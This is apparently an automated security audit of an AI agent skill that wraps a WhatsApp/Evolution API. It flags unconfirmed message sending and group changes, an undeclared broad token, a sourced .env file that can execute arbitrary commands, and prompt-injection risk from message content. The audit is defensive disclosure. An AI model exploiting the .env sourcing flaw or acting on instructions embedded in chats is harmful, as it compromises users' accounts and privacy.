Evolution WhatsApp
WarnAudited by ClawScan on May 18, 2026.
Overview
This appears to be a real WhatsApp/Evolution API wrapper, but it gives the agent broad ability to read and change WhatsApp chats and groups using an undeclared token and without clear confirmation limits.
Install only if you are comfortable letting the agent access and act through your WhatsApp-connected Evolution API instance. Use a dedicated or least-privileged instance if possible, protect the token and any .env file, and require explicit confirmation before sending messages, marking chats read, or changing group membership.
Findings (4)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If invoked incorrectly, the agent could send unwanted WhatsApp messages or media, mark messages as read, or alter group memberships.
The wrapper exposes account-mutating WhatsApp actions, including sending messages and changing group membership, without artifact-level approval or scope controls.
evo_request POST "/message/sendText/${EVO_INSTANCE_NAME}" ... local action="$2" # add, remove, promote, demoteRequire explicit user confirmation with the exact recipient/group, action, and content before any send, mark-read, or group-management call; consider allowlisting contacts or groups.
A broad instance token could let the agent read or act through the connected WhatsApp account beyond what the user intended for a single task.
The skill requires an Evolution instance API token for WhatsApp account control, but the registry metadata declares no required env vars or primary credential, and the artifacts do not describe a narrower permission scope.
export EVO_INSTANCE_TOKEN="your-instance-token"
Declare the credential in metadata, document its scope, use the least-privileged token or dedicated instance available, and rotate/revoke the token if exposed.
If the local .env file is tampered with or contains commands, running the skill could execute arbitrary commands under the user's account.
Sourcing .env executes shell syntax from that file on every invocation, not just simple key/value parsing, and this behavior is not disclosed in SKILL.md.
if [ -f "$SCRIPT_DIR/.env" ]; then
source "$SCRIPT_DIR/.env"
fiAvoid sourcing .env directly; parse only expected variables safely, document the behavior, and keep any local credential file tightly permissioned.
Private chats, contact lists, and messages from other people may be exposed to the agent, and message text could contain instructions that should not be treated as authoritative.
Fetching and summarizing WhatsApp conversations is purpose-aligned, but it brings private and untrusted message content into the agent context.
- Fetch chats, messages, contacts - Summarize group conversations
Only summarize chats you intend to share with the agent, avoid unnecessary broad fetches, and treat retrieved WhatsApp content as data rather than instructions.